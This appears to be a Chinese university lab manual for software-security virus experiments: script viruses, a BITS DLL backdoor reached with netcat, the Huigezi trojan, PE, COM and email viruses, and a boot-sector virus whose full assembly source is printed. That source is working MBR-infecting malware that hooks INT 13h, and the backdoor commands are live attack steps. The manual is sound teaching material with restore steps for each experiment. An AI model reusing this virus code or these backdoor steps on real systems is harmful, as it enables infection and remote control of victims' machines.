軟件安全實(shí)驗(yàn)步驟

腳本病毒實(shí)驗(yàn)【實(shí)驗(yàn)環(huán)境】Windows實(shí)驗(yàn)臺(tái)【實(shí)驗(yàn)步驟】打開Windows實(shí)驗(yàn)臺(tái)，點(diǎn)擊桌面“病毒實(shí)驗(yàn)”，選擇“腳本病毒實(shí)驗(yàn)”，進(jìn)入其實(shí)施面板，如圖2.4.12所示。圖2.4.12一、 腳本病毒代碼分析和查看分別選擇相應(yīng)的腳本文件，學(xué)生用戶即可查看腳本病毒代碼。在界面左側(cè)功能選擇區(qū)選擇實(shí)驗(yàn)名稱，用戶在界面右側(cè)將會(huì)看到該腳本病毒的全部代碼。如圖2.4.13所示。圖2.4.13學(xué)生用戶如需要編輯腳本病毒代碼，用戶在界面右側(cè)將會(huì)看到該腳本病毒的全部代碼，在此基礎(chǔ)上編輯代碼，將會(huì)生成用戶自定義的腳本病毒，點(diǎn)擊“保存腳本”按鈕將把編輯好的腳本文件永久保存，如果編輯過程出現(xiàn)錯(cuò)誤或者異常，點(diǎn)擊“重置腳本”將恢復(fù)最初的腳本代碼。實(shí)驗(yàn)進(jìn)行前，要先點(diǎn)擊“初始化病毒工具”按鈕，對(duì)其實(shí)驗(yàn)所需的工具進(jìn)行初始化；在實(shí)驗(yàn)過程中，如果所需的工具被殺毒軟件查殺，要再次點(diǎn)擊“初始化病毒工具”按鈕，對(duì)工具重新進(jìn)行初始化，以便實(shí)驗(yàn)順利進(jìn)行。腳本實(shí)現(xiàn)的步驟為：執(zhí)行(或恢復(fù))腳本；關(guān)閉EXPlorer進(jìn)程；打開EXPlorer進(jìn)程；查看腳本是否生效。二、 病毒攻擊實(shí)驗(yàn)1 -復(fù)制病毒副本到系統(tǒng)文件夾(1) 在界面左側(cè)功能選擇區(qū)選擇實(shí)驗(yàn)名稱“復(fù)制病毒副本到系統(tǒng)文件夾”。(2) 開始進(jìn)行實(shí)驗(yàn)，運(yùn)行腳本病毒代碼，然后打開系統(tǒng)目錄，如圖2.4.14所示，可以看到病毒副本(Win32system.vbs)已經(jīng)出現(xiàn)。圖2.4.14(3) 開始恢復(fù)實(shí)驗(yàn)，運(yùn)行恢復(fù)代碼，如圖2.4.15所示；然后再次查看系統(tǒng)目錄，用戶會(huì)發(fā)現(xiàn)剛剛出現(xiàn)的病毒副本文件已經(jīng)被清除。圖2.4.15三、 病毒攻擊實(shí)驗(yàn)2 -復(fù)制病毒副本到啟動(dòng)菜單(1) 在界面左側(cè)功能選擇區(qū)選擇實(shí)驗(yàn)名稱“復(fù)制病毒副本到啟動(dòng)菜單”。(2) 開始進(jìn)行實(shí)驗(yàn)，運(yùn)行腳本病毒代碼，然后打開系統(tǒng)目錄，可以看到開始菜單啟動(dòng)項(xiàng)中新增加了腳本病毒W(wǎng)in32system.vbs，如圖2.4.16所示，下次開機(jī)將會(huì)自動(dòng)執(zhí)行發(fā)作。圖2.4.16(3) 開始恢復(fù)實(shí)驗(yàn)，運(yùn)行恢復(fù)代碼，然后再次查看系統(tǒng)目錄，用戶會(huì)發(fā)現(xiàn)剛剛出現(xiàn)的病毒副本文件已經(jīng)被清除。四、 病毒攻擊實(shí)驗(yàn)3 -禁止“運(yùn)行”菜單(1) 在界面左側(cè)功能選擇區(qū)選擇實(shí)驗(yàn)名稱“禁止運(yùn)行菜單”。(2) 開始進(jìn)行實(shí)驗(yàn)，運(yùn)行腳本病毒代碼，然后打開開始菜單，如圖2.4.17所示，“運(yùn)行”已被禁止。圖2.4.17(3) 開始恢復(fù)實(shí)驗(yàn)，運(yùn)行恢復(fù)代碼，然后再次打開開始菜單，選擇“運(yùn)行”，可以看到運(yùn)行功能已經(jīng)恢復(fù)。五、 病毒攻擊實(shí)驗(yàn)4 -禁止“關(guān)閉系統(tǒng)”菜單(1) 在界面左側(cè)功能選擇區(qū)選擇實(shí)驗(yàn)名稱“禁止關(guān)閉系統(tǒng)菜單”。(2) 開始進(jìn)行實(shí)驗(yàn)，運(yùn)行腳本病毒代碼，然后打開開始菜單，可以發(fā)現(xiàn)“關(guān)閉系統(tǒng)”菜單已經(jīng)消失，如圖2.4.18所示。圖2.4.18(3) 開始恢復(fù)實(shí)驗(yàn)，運(yùn)行恢復(fù)代碼，然后再次打開開始菜單，可以看到“關(guān)閉計(jì)算機(jī)”功能已經(jīng)恢復(fù)。六、 病毒攻擊實(shí)驗(yàn)5 -禁止顯示桌面所有圖標(biāo)(1) 在界面左側(cè)功能選擇區(qū)選擇實(shí)驗(yàn)名稱“禁止顯示桌面所有圖標(biāo)”。(2) 開始進(jìn)行實(shí)驗(yàn)，運(yùn)行腳本病毒代碼，執(zhí)行系統(tǒng)注銷操作，可以發(fā)現(xiàn)桌面所有圖標(biāo)均已經(jīng)消失，如圖2.4.19所示。圖2.4.19(3) 開始恢復(fù)實(shí)驗(yàn)，運(yùn)行恢復(fù)代碼，可以發(fā)現(xiàn)桌面所有圖標(biāo)均已經(jīng)恢復(fù)。七、 病毒攻擊實(shí)驗(yàn)6 -禁止“任務(wù)欄”和“開始”(1) 在界面左側(cè)功能選擇區(qū)選擇實(shí)驗(yàn)名稱，禁止“任務(wù)欄”和“開始”。(2) 開始進(jìn)行實(shí)驗(yàn)，運(yùn)行腳本病毒代碼，然后右鍵點(diǎn)擊開始菜單屬性，會(huì)有如圖2.4.110所示的提示信息，禁止修改任務(wù)欄信息。圖2.4.110(3) 開始恢復(fù)實(shí)驗(yàn)，運(yùn)行恢復(fù)代碼，再次修改開始菜單，功能已經(jīng)恢復(fù)。八、 病毒攻擊實(shí)驗(yàn)7 -禁止“控制面板”(1) 在界面左側(cè)功能選擇區(qū)選擇實(shí)驗(yàn)名稱“禁止控制面板”。(2) 開始進(jìn)行實(shí)驗(yàn)，運(yùn)行腳本病毒代碼，選擇“開始”菜單下的“設(shè)置”，可以看到“控制面板”項(xiàng)消失了，如圖2.4.111所示。圖2.4.111(3) 開始恢復(fù)實(shí)驗(yàn)，運(yùn)行恢復(fù)代碼，選擇“開始”菜單下的“設(shè)置”，可以看到“控制面板”項(xiàng)已經(jīng)恢復(fù)了。九、 病毒攻擊實(shí)驗(yàn)8 -修改“IE”默認(rèn)頁(yè)(1) 在界面左側(cè)功能選擇區(qū)選擇實(shí)驗(yàn)名稱“修改IE默認(rèn)頁(yè)”。(2) 開始進(jìn)行實(shí)驗(yàn)，運(yùn)行腳本病毒代碼，然后打開Internet EXPlorer屬性，可以看到“地址欄”默認(rèn)項(xiàng)已被進(jìn)制更改，如圖2.4.112所示。圖2.4.112(3) 開始恢復(fù)實(shí)驗(yàn)，運(yùn)行恢復(fù)代碼，可以看到“地址欄”默認(rèn)項(xiàng)已經(jīng)恢復(fù)更改功能。DLL注入型病毒實(shí)驗(yàn) 【實(shí)驗(yàn)環(huán)境】Windows實(shí)驗(yàn)臺(tái)所需工具：BITS.Dll 、IceSWord 【實(shí)驗(yàn)步驟】一、 安裝BITS(Windows實(shí)驗(yàn)臺(tái))(1) 啟動(dòng)Windows實(shí)驗(yàn)臺(tái)，進(jìn)入Windows2003系統(tǒng)。(2) 從實(shí)驗(yàn)臺(tái)打開實(shí)驗(yàn)工具箱，從“信息系統(tǒng)安全-計(jì)算機(jī)病毒”分類中下載DLL病毒并解壓。(3) 進(jìn)入cmd命令行，在BITS文件夾下運(yùn)行rundll32.exe BITS.dll,Install ；為連接的識(shí)別碼，主要用于識(shí)別遠(yuǎn)程連接屬于正常服務(wù)還是bits后門服務(wù)。輸入的命令具體如下：rundll32.exe BITS.dll,Install test。二、 連接BITS服務(wù)(本地主機(jī))切換回本地主機(jī)系統(tǒng)，主動(dòng)連接遠(yuǎn)程主機(jī)即Windows實(shí)驗(yàn)臺(tái)系統(tǒng)的任一端口：(1) 從本地主機(jī)連接實(shí)驗(yàn)工具箱，從“網(wǎng)絡(luò)安全-攻防系統(tǒng)中”下載NC連接工具并解壓。(2) 進(jìn)入cmd命令行，在NC.exe所在文件夾下輸入nc 139命令，連接139端口(注： 為遠(yuǎn)程IP地址即Windows實(shí)驗(yàn)臺(tái)IP)。(3) 然后直接輸入testdancewithdolphinxell:9999，激活9999端口，其中test為連接識(shí)別碼，與rundll32.exe BITS.dll,Install test中的test對(duì)應(yīng)。(4) 連接遠(yuǎn)程主機(jī)9999端口：輸入命令nc 9999；顯示如圖2.4.21所示，連接正常。(注： 為遠(yuǎn)程IP地址即Windows實(shí)驗(yàn)臺(tái)IP) 圖2.4.21三、 查看BITS主機(jī)狀態(tài)(Windows實(shí)驗(yàn)臺(tái))(1) 查看Windows進(jìn)程進(jìn)入Windows實(shí)驗(yàn)臺(tái)系統(tǒng)，打開任務(wù)管理器，查看進(jìn)程信息，可以發(fā)現(xiàn)CMD程序正在運(yùn)行，但實(shí)驗(yàn)臺(tái)中并沒有運(yùn)行CMD程序，如圖2.4.22所示。 圖2.4.22(2) 查看系統(tǒng)端口在cmd命令行下輸入netstat an，查看系統(tǒng)端口，如圖2.4.23所示，可以觀察到本地機(jī)（）對(duì)實(shí)驗(yàn)臺(tái)（）9999端口進(jìn)行的連接。 圖2.4.23(3) 查看模塊調(diào)用啟用icesword，查看模塊調(diào)用，如圖2.4.24所示。 圖2.4.24(4) 卸載驗(yàn)證卸載dll進(jìn)程，再次連接查看軟件是否工作正常。四、 卸載BITS(Windows 實(shí)驗(yàn)臺(tái))在Windows實(shí)驗(yàn)臺(tái)的命令窗口執(zhí)行命令：rundll32.exe BITS.dll,Uninstall 木馬攻擊實(shí)驗(yàn) 【實(shí)驗(yàn)環(huán)境】Windows實(shí)驗(yàn)臺(tái)所需工具：灰鴿子客戶端軟件、icesWord 【實(shí)驗(yàn)步驟】啟動(dòng)Windows實(shí)驗(yàn)臺(tái)，并設(shè)置實(shí)驗(yàn)臺(tái)的IP地址，以實(shí)驗(yàn)臺(tái)為目標(biāo)主機(jī)進(jìn)行實(shí)驗(yàn)。個(gè)別實(shí)驗(yàn)學(xué)生可以以2人一組的形式，互為攻擊方和被攻擊方來進(jìn)行。一、 木馬制作(1) 根據(jù)攻防實(shí)驗(yàn)制作灰鴿子木馬，配置安裝目錄，IP地址填寫攻擊方的IP地址（本例采用的是本地機(jī)）如圖2.4.31所示。 圖2.4.31(2) 啟動(dòng)項(xiàng)配置，如圖2.4.32所示。 圖2.4.32(3) 高級(jí)設(shè)置，選擇使用瀏覽器進(jìn)程啟動(dòng)。并生成服務(wù)器程序，如圖2.4.33所示。 圖2.4.33二、 木馬種植(1) 通過漏洞或溢出得到遠(yuǎn)程主機(jī)權(quán)限，上傳并運(yùn)行灰鴿子木馬（本例目標(biāo)以實(shí)驗(yàn)臺(tái)為例）。服務(wù)器木馬程序如圖2.4.3-4 圖2.4.34(2) 本地主機(jī)利用灰鴿子對(duì)植入灰鴿子的主機(jī)進(jìn)行連接，看是否能連接灰鴿子。三、 木馬分析(1) 察看端口當(dāng)灰鴿子的客戶端服務(wù)器啟動(dòng)之后，會(huì)發(fā)現(xiàn)本地灰鴿子客戶端有主機(jī)上線，說明灰鴿子已經(jīng)啟動(dòng)成功，如圖2.4.35所示。 圖2.4.35查看遠(yuǎn)程主機(jī)(實(shí)驗(yàn)臺(tái))的開放端口如圖2.4.36所示，肉雞正在與本地連接，表示肉雞已經(jīng)上線，可以對(duì)其進(jìn)行控制。 圖2.4.36(2) 查看進(jìn)程啟動(dòng)icesWord檢查開放進(jìn)程，進(jìn)程中多出了IEXPLORE.exe進(jìn)程，如圖2.4.37所示；這個(gè)進(jìn)程即為啟動(dòng)灰鴿子木馬的進(jìn)程，起到了隱藏灰鴿子自身程序的目的。 圖2.4.37(3) 查看服務(wù)進(jìn)入“控制面板”-“管理工具”中的“服務(wù)”選項(xiàng)查看，增加了一個(gè)名為huigezi的服務(wù)，查看其屬性如圖2.4.38所示；該服務(wù)為啟動(dòng)計(jì)算機(jī)時(shí)，灰鴿子的啟動(dòng)程序。 圖2.4.38四、 卸載灰鴿子(1) 停止當(dāng)前運(yùn)行的IEXPLORE程序和huigezi服務(wù)。(2) 將Windows目錄下的huigezi.exe文件刪除，重新啟動(dòng)計(jì)算機(jī)即可卸載灰鴿子程序。 引導(dǎo)型病毒實(shí)驗(yàn) 【實(shí)驗(yàn)環(huán)境】Windows實(shí)驗(yàn)臺(tái)實(shí)驗(yàn)工具：MaxDos5.8、masm5、WinHex 【實(shí)驗(yàn)步驟】一、 查看主引導(dǎo)扇區(qū)打開Windows實(shí)驗(yàn)臺(tái)，在啟動(dòng)選項(xiàng)中選擇進(jìn)入Windows2003系統(tǒng)；下載并解壓引導(dǎo)型病毒工具，打開WinHex工具，點(diǎn)擊菜單項(xiàng)“工具|磁盤編輯器”，打開磁盤編輯器，選擇“物理媒介-HD0”，如圖2.4.43和圖2.4.44所示；點(diǎn)擊“是”，即可查看第一塊硬盤的具體內(nèi)容，如圖2.4.45所示，其中第一個(gè)扇區(qū)即為主引導(dǎo)扇區(qū)。 圖2.4.43選擇“磁盤編輯器” 圖2.4.44選擇HD0 圖2.4.45主引導(dǎo)扇區(qū)二、 備份主引導(dǎo)扇區(qū)解壓msam5.zip(本例解壓到D盤根目錄下)，并將前面解壓到的“1.asm”文件復(fù)制到msam5目錄下。然后安裝MaxDos并重新啟動(dòng)系統(tǒng)，在啟動(dòng)選項(xiàng)中選擇進(jìn)入MaxDos v5.8s，如圖2.4.46所示選擇“運(yùn)行MaxDos v5.8s”，回車；密碼默認(rèn)為max，直接回車進(jìn)入如圖2.4.47所示的界面，選擇“A.MaxDos工具箱”，回車。 圖2.4.46 MaxDos啟動(dòng)選項(xiàng)，選擇“運(yùn)行MaxDos v5.8s” 圖2.4.47 MaxDos首菜單，選擇“MaxDos工具箱”進(jìn)入DOS系統(tǒng)界面，使用aefdisk工具對(duì)MBR進(jìn)行備份，如圖2.4.48所示。 圖2.4.48備份MBR三、 編譯并運(yùn)行主引導(dǎo)區(qū)病毒程序輸入如圖2.4.49和圖2.4.410所示的命令，編譯并運(yùn)行主引導(dǎo)區(qū)病毒源碼1.asm（需放到masm5目錄下,此示例中masm5解壓到D盤根目錄）。 圖2.4.49編譯病毒源碼 圖2.4.410連接生成exe并運(yùn)行1.asm的具體內(nèi)容與分析如下：;引導(dǎo)區(qū)病毒樣例.286.model small.code;程序入口參數(shù);ax=內(nèi)存高端地址 bx=7c00h 引導(dǎo)程序起始地址;cx=0001h 表示從ch(00)磁道cl(01)扇區(qū)讀出了本程序;dx=00/80h 表示從dx(00:A驅(qū))(80:C驅(qū))讀出了本程序;ds=es=ss=cs=0 初始段值OFF equ VirusSize=OFF End-OFF StartStart: jmp short Begin VirusFlag db V ;病毒標(biāo)志BootData: ;這里有兩個(gè)重要數(shù)據(jù)結(jié)構(gòu)，不能是代碼 org 50h ;病毒從Offset50h開始，病毒未用以上數(shù)據(jù)Begin: ;但其它程序可能使用，故須保留 mov bx,7c00h mov sp,bx ;設(shè)sp,使ss:sp=0:7c00h sti mov ax,ds:413h ;得到內(nèi)存大小(0:413h單元存有以K計(jì)數(shù)的內(nèi)存大小) dec ax dec ax mov ds:413h,ax ;將原內(nèi)存大小減2K mov cl,06 shl ax,cl ;計(jì)算高端內(nèi)存地址 mov es,ax xor di,di mov si,sp mov cx,VirusSize cld rep movsb ;把病毒搬移到高端地址里 push ax mov di,OFF HighAddr push di retf ;跳到高端繼續(xù)執(zhí)行HighAddr: cli ;修改中斷向量前，最好關(guān)中斷 xchg ds:13h*4+2,ax mov cs:OldInt13Seg,ax mov ax,OFF NewInt13 xchg ds:13h*4,ax mov cs:OldInt13Off,ax ;修改中斷13h push ds pop es ;把es復(fù)位為0 cmp dl,80h ;是否從硬盤引導(dǎo)？ jz short ReadOldHardBoot push dx ; 從軟盤引導(dǎo)，則傳染硬盤 mov dl,80h call OptDisk ;調(diào)用傳染模塊 pop dxReadOldFlopyBoot: ;讀出原軟盤引導(dǎo)程序 mov ax,0201h mov cx,79*100h+17 ;傳染時(shí)將原引導(dǎo)程序保存在0面79道17扇區(qū)中 mov dh,00h call CallInt13 jc short ReadOldFlopyBoot ;失敗，繼續(xù)讀直到成功ExecOldBoot: cmp es:bx.Flags,0aa55h jnz ExecOldBoot mov ah,02h int 1ah ;取系統(tǒng)時(shí)間 cmp cx,1*100h+30 ;是否大于01：30分 jb ExitDisp ;未到，則不顯示 lea si,VirusMsg DispMsg: mov al,cs:si inc si mov ah,0eh int 10h ;顯示al中的字符 or al,al jnz DispMsg xor ax,ax int 16hExitDisp: mov cx,0001h ;恢復(fù)cx初值 push es push bx retf ;去執(zhí)行原引導(dǎo)程序ReadOldHardBoot: mov ax,0201h mov cx,0002h ;傳染時(shí)將原硬盤主引導(dǎo)程序保存在0面0道2扇區(qū)中 mov dh,00h call CallInt13 ;讀出 jc short ReadOldHardBoot ;失敗，繼續(xù)讀直到成功 jmp short ExecOldBoot ;去執(zhí)行原引導(dǎo)程序NewInt13: ;新Int 13h（傳染塊） cmp dx,0000h ;是軟盤嗎？ jnz short JmpOldInt13 cmp ah,02h jnz short JmpOldInt13 cmp cx,0001h jnz short JmpOldInt13 call OptDisk ;若發(fā)現(xiàn)讀軟盤扇區(qū)，則感染軟盤JmpOldInt13: cli JmpFar db 0eah ;遠(yuǎn)跳轉(zhuǎn)指令 OldInt13Off dw ? OldInt13Seg dw ?CallInt13: pushf ;模擬Int 13h指令 push cs call JmpOldInt13 ret OptDisk: ;傳染dl表示的磁盤（dl-0 A: 80:C) pusha push ds push es ;保存段址與通用寄存器 push cs pop es push cs pop ds ;使ds=es=cs mov bx,OFF OldBootSpace mov ax,0201h mov cx,0001h mov dh,00h call CallInt13 ;讀原引導(dǎo)扇區(qū) jc short OptOver mov di,bx cmp ds:di.VirusFlag,V ;判斷是否已經(jīng)有病毒？ jz short OptOver ;若有，則退出 cmp dl,00h jz short IsOptFlopyDiskIsOptHardDisk: mov cx,0002h ;若是硬盤，保存在0面0道2扇區(qū) jmp short SaveOldBootIsOptFlopyDisk: mov cx,79*100h+17 ;若是軟盤，保存在0面79道17扇區(qū)SaveOldBoot: mov ax,0301h mov dh,0h call CallInt13 ;保存原引導(dǎo)扇區(qū) jc short OptOver mov si,OFF Start cld movsw movsb ;修改原扇區(qū)首指令（Jmp near 3字節(jié)） mov di,OFF Begin+200h mov si,OFF Begin mov cx,OFF End-OFF Begin cld rep movsb ;修改原引導(dǎo)扇區(qū)指令cx字節(jié) mov ax,0301h mov cx,0001h mov dh,00h call CallInt13 ;寫回已經(jīng)被修改了的引導(dǎo)程序OptOver: ;退出傳染 pop es pop ds ;恢復(fù)段址與通用寄存器 popa ret ;以下是病毒要顯示的信息，與病毒版本信息 VirusMsg db 0dh,0ah,07h,Night is deep,you must go sleep!,0dh,0ah,0 db Night Sleep ver 1.0,by whg 2001.5.5,0 End: org 1feh Flags dw 0aa55h ;引導(dǎo)扇區(qū)有效標(biāo)志 OldBootSpace db 210h dup(?) ;定義緩沖區(qū)Install: xor ax,ax mov ds,ax cli mov ax,ds:13h*4 mov cs:OldInt13Off,ax mov ax,ds:13h*4+2 mov cs:OldInt13Seg,ax mov dl,80h call OptDisk mov ax,4c00h int 21hEnd Install四、 病毒感染癥狀與分析運(yùn)行1.exe后，重新啟動(dòng)系統(tǒng)，首先看到如圖2.4.411所示的界面，回車即可進(jìn)入正常的啟動(dòng)選項(xiàng)；選擇進(jìn)入Win2003，打開WinHex工具，可以看到主引導(dǎo)扇區(qū)已被修改，原主引導(dǎo)扇區(qū)的內(nèi)容已被病毒備份到第二個(gè)扇區(qū)，如圖2.4.412所示。 圖2.4.411系統(tǒng)啟動(dòng)選項(xiàng)前的病毒提示 圖2.4.412被感染的主引導(dǎo)扇區(qū)五、 恢復(fù)MBR，清除病毒重新啟動(dòng)系統(tǒng)，進(jìn)入MaxDos，使用aefdisk對(duì)MBR進(jìn)行恢復(fù)，如圖2.4.413所示（注意：在D盤生成的mbr.txt文件名大小寫）。 圖2.4.413恢復(fù)MBR恢復(fù)成功后重新啟動(dòng)系統(tǒng)，無病毒提示界面，進(jìn)入Win2003系統(tǒng)，使用WinHex查看主引導(dǎo)區(qū)，如圖2.4.414所示，已恢復(fù)為原內(nèi)容。 圖2.4.414已恢復(fù)的主引導(dǎo)扇區(qū)也可以嘗試在Dos下使用fdisk /mbr命令對(duì)主引導(dǎo)區(qū)進(jìn)行恢復(fù)，進(jìn)入Windows系統(tǒng)后需在計(jì)算機(jī)管理中對(duì)非系統(tǒng)盤重新分配盤符，以正確顯示在“我的電腦”中。 PE型病毒實(shí)驗(yàn)【實(shí)驗(yàn)環(huán)境】Windows實(shí)驗(yàn)臺(tái)病毒實(shí)驗(yàn)工具【實(shí)驗(yàn)步驟】啟動(dòng)Windows實(shí)驗(yàn)臺(tái)，進(jìn)入Windows2003系統(tǒng)；雙擊桌面上的“病毒實(shí)驗(yàn)”圖標(biāo)，進(jìn)入病毒實(shí)驗(yàn)界面。在界面上選擇“PE病毒實(shí)驗(yàn)”，進(jìn)入其實(shí)施面板，如圖2.4.51所示。圖Error! No text of specified style in document.1實(shí)驗(yàn)進(jìn)行前，要先點(diǎn)擊“初始化病毒工具”按鈕，對(duì)其實(shí)驗(yàn)所需的工具進(jìn)行初始化；在實(shí)驗(yàn)過程中，如果所需的工具被殺毒軟件查殺，要再次點(diǎn)擊“初始化病毒工具”按鈕，對(duì)工具重新進(jìn)行初始化，以便實(shí)驗(yàn)順利進(jìn)行。一、 HOST程序分析(1) 點(diǎn)擊面板中“PE文件工具|瀏覽|host.exe”（C:ISES病毒ToolsVirusToolsPE目錄下），如圖2.4.52所示。圖Error! No text of specified style in document.2(2) 點(diǎn)擊“節(jié)表”，可查看節(jié)信息，如圖2.4.53所示。圖Error! No text of specified style in document.3(3) 點(diǎn)擊面板中的“host程序”，運(yùn)行如圖2.4.54所示。圖Error! No text of specified style in document.4(4) 通過點(diǎn)擊面板中的“添加新節(jié)”，可使cc.exe感染host程序，然后點(diǎn)擊面板中的“host程序”，查看感染后的運(yùn)行結(jié)果。二、 感染過程(1) 點(diǎn)擊面板中的“添加新節(jié)源碼”，可看到win32匯編編寫的病毒源碼，如圖2.4.55所示。圖Error! No text of specified style in document.5(2) 通過點(diǎn)擊面板中的“添加新節(jié)”，可使cc.exe感染host程序，出現(xiàn)如圖2.4.56所示的提示；然后點(diǎn)擊面板中的“host程序”，查看感染后的運(yùn)行結(jié)果。圖Error! No text of specified style in document.6(3) 點(diǎn)擊確定，進(jìn)入正常host程序，如圖2.4.57所示。圖Error! No text of specified style in document.7三、 感染前后對(duì)比及修改(1) 點(diǎn)擊面板中“PE文件工具|瀏覽|host.exe”，如圖2.4.58所示。圖Error! No text of specified style in document.8(2) 點(diǎn)擊“節(jié)表”，可查看節(jié)信息，如圖2.4.59所示。圖Error! No text of specified style in document.9(3) 幾個(gè)關(guān)鍵值的對(duì)比，如圖2.4.510和Error! Reference source not found.所示。圖Error! No text of specified style in document.10圖Error! No text of specified style in document.11(4) 簡(jiǎn)單修改數(shù)值，以達(dá)到原先正常運(yùn)行效果，如圖2.4.512所示設(shè)置相應(yīng)的值。圖Error! No text of specified style in document.12修改入口點(diǎn)為原先的FF，然后點(diǎn)擊應(yīng)用更改，成功修改完成；關(guān)閉peditor。然后點(diǎn)擊面板中的“host程序”結(jié)果正常運(yùn)行。COM病毒實(shí)驗(yàn)【實(shí)驗(yàn)環(huán)境】Windows實(shí)驗(yàn)臺(tái)所需工具：masm6.0版本 gold.exe反匯編工具(可自行網(wǎng)上下載，本實(shí)驗(yàn)對(duì)其使用并不做要求)【實(shí)驗(yàn)步驟】啟動(dòng)Windows實(shí)驗(yàn)臺(tái)，進(jìn)入Windows2003系統(tǒng)。一、 準(zhǔn)備實(shí)驗(yàn)環(huán)境(1) 在實(shí)驗(yàn)臺(tái)系統(tǒng)中安裝masm 16，如圖2.4.61所示。圖2.4.61(2) 安裝完成后，加入相應(yīng)的環(huán)境變量，如圖2.4.62所示。圖2.4.62二、 自制(1) 在實(shí)驗(yàn)臺(tái)系統(tǒng)的c盤目錄“c:temptemp”下新建兩個(gè)文件“c.asm”和“virus.asm”；“c.asm”中代碼如圖2.4.63所示。圖2.4.63(2) 編譯生成“c.exe”，運(yùn)行如圖2.4.64所示。圖2.4.64(3) 可在當(dāng)前目錄下查看新生成文件，如圖2.4.65所示。圖2.4.65(4) 將“c.exe”轉(zhuǎn)換為“”程序，如圖2.4.66所示。圖2.4.66(5) 查看新生成的“”文件，如圖2.4.67所示。圖2.4.67三、 自制virus.exe(1) 在“virus.asm”中添加代碼，如圖2.4.68、圖2.4.69和圖2.4.610所示。圖2.4.68圖2.4.69圖2.4.610(2) 編譯生成可執(zhí)行文件，如圖2.4.611所示。圖2.4.611(3) 查看生成文件，如圖2.4.612所示。圖2.4.612四、 感染并查看(1) “”正常執(zhí)行。如圖2.4.613所示。圖2.4.613(2) 運(yùn)行可執(zhí)行文件進(jìn)行感染，如圖2.4.614所示。圖2.4.614(3) 感染后文件變化，如圖2.4.615所示。圖2.4.615感染前后文件大小與時(shí)間的變化(4) 復(fù)制“”一個(gè)新文件“”，以便后面修改使用，如圖2.4.616所示。圖2.4.616(5) 執(zhí)行“”結(jié)果如圖2.4.617所示。圖2.4.617五、 修復(fù)(1) 對(duì)“”進(jìn)行修復(fù)，如圖2.4.618所示。圖2.4.618(2) 將“test1”改為“”，執(zhí)行，如圖2.4.619所示。圖2.4.619(3) 使用“glod.exe”匯編工具，查看相關(guān)修改前后的文件內(nèi)容，如圖2.4.620和圖2.4.621所示。圖2.4.620圖2.4.621郵件型病毒實(shí)驗(yàn) 【實(shí)驗(yàn)環(huán)境】Windows實(shí)驗(yàn)臺(tái)所需工具：病毒實(shí)驗(yàn)工具 【實(shí)驗(yàn)步驟】一、 喬裝執(zhí)行后綴名(1) 啟動(dòng)Windows實(shí)驗(yàn)臺(tái)，在實(shí)驗(yàn)臺(tái)中啟動(dòng)實(shí)驗(yàn)工具箱下載實(shí)驗(yàn)工具并解壓縮。雙擊執(zhí)行MailServer.bat。從開始-程序-hMailServer-hMailServer Administrator啟動(dòng)，點(diǎn)擊Connect按鈕并輸入密碼。在界面左側(cè)功能樹中選擇Status，確保服務(wù)狀態(tài)為“Running”，如圖2.4.71。此時(shí)郵件服務(wù)器中有兩個(gè)郵件賬戶：、，密碼均為：。 圖2.4.71(2) 從開始-程序-Microsoft Office- Microsoft Office 工具找到Microsoft Office 2003 用戶設(shè)置保存向?qū)Р?dòng)。選下一步，選擇“將原先保存的設(shè)置恢復(fù)應(yīng)用到本機(jī)上”。選下一步，點(diǎn)擊瀏覽選擇解壓縮得到的“用戶設(shè)置導(dǎo)出.OPS”文件，點(diǎn)擊完成-退出。此時(shí)Outlook中已導(dǎo)入了兩個(gè)郵件賬戶、及其服務(wù)器設(shè)置信息，默認(rèn)的Outlook發(fā)送郵件的賬戶為，并且兩個(gè)郵箱地址都保存在Outlook的地址簿中。(3) 將解壓縮得到的“mspaint.exe”文件（該文件是windows附帶的畫圖工具軟件）修改文件名為“hello.txt.exe”，創(chuàng)建并將其添加到壓縮包“hello.rar”。(4) 啟動(dòng)Microsoft Office Outlook 2003（啟動(dòng)中及后續(xù)實(shí)驗(yàn)中彈出的安裝提示可以全部按取消按鈕）。點(diǎn)擊工具欄新建按鈕，新建郵件。收件人填寫，主題和郵件正文可以隨意填寫。點(diǎn)擊工具欄的回形針按鈕添加附件，選擇剛創(chuàng)建的“hello.rar”文件。郵件編寫完成且尚未發(fā)送，如下圖： (5) 恢復(fù)Windows資源管理器對(duì)文件類型擴(kuò)展名的默認(rèn)設(shè)置。打開資源管理器，依次打開菜單欄-工具-文件夾選項(xiàng)-查看，將“隱藏已知文件類型的擴(kuò)展名”選中，如圖2.4.71所示。 圖2.4.71(6) 發(fā)送上一步中編寫的郵件（若彈出安全警告選擇仍然繼續(xù)發(fā)送）。發(fā)送成功后繼續(xù)在Outlook界面中按F9快捷鍵收取郵件（若提示輸入密碼時(shí)輸入密碼：，并選中“將密碼保存在密碼表中”復(fù)選框）。收到郵件后，可以看到帶有一個(gè)附件“hello.rar”，下載附件并解壓可以看到文件“hello.txt”，如圖2.4.72所示 圖2.4.72(7) 看似為txt文件文件，其實(shí)為可執(zhí)行文件，雙擊打開可以發(fā)現(xiàn)實(shí)際是運(yùn)行了一個(gè)畫圖程序。(8) 回到資源管理器的“文件夾設(shè)置”，去掉該選項(xiàng)，即可看到hello.txt的真正后綴名，如圖2.4.74所示。 圖2.4.74二、 收到可執(zhí)行的vbs腳本文件一般利用vb腳本進(jìn)行Outlook的控制發(fā)送，通常情況下為公司內(nèi)局域網(wǎng)，根據(jù)地址本中所含地址，逐個(gè)發(fā)送帶毒文件，代碼大致如圖2.4.75和圖2.4.76所示。 圖2.4.75 圖2.4.76將Outlook中的、兩個(gè)郵箱添加到通訊簿中后，執(zhí)行上述腳本代碼（此腳本代碼可從試驗(yàn)臺(tái)中打開實(shí)驗(yàn)工具箱按照“實(shí)驗(yàn)源碼”-“計(jì)算機(jī)病毒源碼”下載獲?。utlook的安全機(jī)制會(huì)給出一些警告提示，出現(xiàn)的效果如2.4.77所示。 2.4.77如果用戶由于在不知情的情況下或者安全意識(shí)薄弱甚至誤操作等原因，而選擇了允許訪問及郵件發(fā)送，就造成了病毒的傳播。在較高版本的Outlook中可以允許用戶設(shè)置此類警告信息為不提示，更增加了病毒傳播的機(jī)會(huì)。Outlook地址簿中保存的郵箱會(huì)收到如下的郵件： 